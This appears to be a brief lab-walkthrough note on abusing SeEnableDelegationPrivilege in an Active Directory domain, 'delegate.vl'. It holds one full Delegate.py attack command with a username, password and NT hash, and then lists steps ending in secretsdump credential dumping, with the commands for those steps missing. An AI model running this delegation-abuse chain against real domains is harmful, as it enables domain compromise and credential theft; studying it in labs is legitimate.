SeEnableDelegationPrivilege

Use the script: Delegate.py Create a password and obtain its hash:

Run the script multiple times:

python3 Delegate.py -l <lhost-ip> -r <rhost-ip> -c <computer-name> -p TestPassword321 -d delegate.vl -dc dc1.delegate.vl -u N.Thompson -P KALEB_2341 -N C7BE3644A2EB37C9BB1F248E9E0B9AFC

If error then do the last part manually:

and

OR

  • First create a machine account:

  • Add DNS record for the machine created:

  • Add UAC:

  • Add SPN:

and

  • To get TGT:

  • Convert previously used password to hash and do:

  • Then use secretsdump:

Last updated

Was this helpful?